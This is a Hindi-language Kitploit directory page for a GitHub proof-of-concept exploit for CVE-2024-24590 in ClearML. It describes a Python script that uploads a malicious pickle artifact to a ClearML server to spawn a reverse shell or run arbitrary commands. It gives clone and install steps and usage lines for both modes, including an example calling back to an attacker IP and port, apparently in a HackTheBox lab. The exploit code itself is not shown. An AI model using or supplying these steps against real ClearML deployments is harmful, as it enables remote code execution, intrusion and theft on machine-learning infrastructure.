Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-24590-ClearML-RCE-CMD-POC — CVE-2024-24590 ClearML RCE&CMD POC | Kitploit
उपकरण/GitHubGitHub/diegogarciayala/cve-2024-24590-clearml-rce-cmd-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणकमांड एंड कंट्रोलआपूर्ति श्रृंखला सुरक्षारिमोट एक्सेस टूल
GitHubdiegogarciayala/cve-2024-24590-clearml-rce-cmd-poc

CVE-2024-24590-ClearML-RCE-CMD-POC

CVE-2024-24590 ClearML RCE&CMD POC

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
9132 साल पहलेअभी तक समीक्षित नहीं
साझा करें

ClearML शोषण स्क्रिप्ट

यह रिपॉजिटरी CVE-2024-24590 के लिए एक Python शोषण स्क्रिप्ट शामिल करती है। स्क्रिप्ट ClearML पर एक दुर्भावनापूर्ण pickle फ़ाइल अपलोड करने के लिए डिज़ाइन की गई है, जो रिवर्स शेल या कस्टम कमांड निष्पादित करती है।

विशेषताएँ

  • ClearML पर एक दुर्भावनापूर्ण pickle आर्टिफैक्ट अपलोड करता है।
  • लक्ष्य मशीन पर रिवर्स शेल या कस्टम कमांड निष्पादित करता है।
  • कस्टम प्रोजेक्ट और कार्य नामों का समर्थन करता है।
  • कार्य पर टैग सेट करने की अनुमति देता है।

उपयोग

पूर्वापेक्षाएँ

  • Python 3.x
  • ClearML SDK
  • argparse (आमतौर पर Python में शामिल होता है)

स्थापना

  1. रिपॉजिटरी को क्लोन करें:

    root@kitploit:~
    git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
    cd CVE-2024-24590-ClearML-RCE-CMD-POC
    
  2. ClearML SDK स्थापित करें:

    root@kitploit:~
    pip install clearml
    clearml-init
    

स्क्रिप्ट चलाना

स्क्रिप्ट ऑपरेशन के दो मोड का समर्थन करती है: default और cmd।

डिफ़ॉल्ट मोड

इस मोड में, आपको रिवर्स शेल स्थापित करने के लिए हमलावर का IP और पोर्ट प्रदान करना होगा।

root@kitploit:~
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>

CMD मोड

इस मोड में, आप निष्पादित होने वाला एक कस्टम कमांड प्रदान कर सकते हैं।

root@kitploit:~
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"

उदाहरण

root@kitploit:~
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
root@kitploit:~
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"

परिचय

  • HackTheBox: sl4sh1t0
  • Telegram: sl4sh1t0
  • X (Twitter): @diegogarciayala

क्रेडिट्स

https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

टूल डाउनलोड करें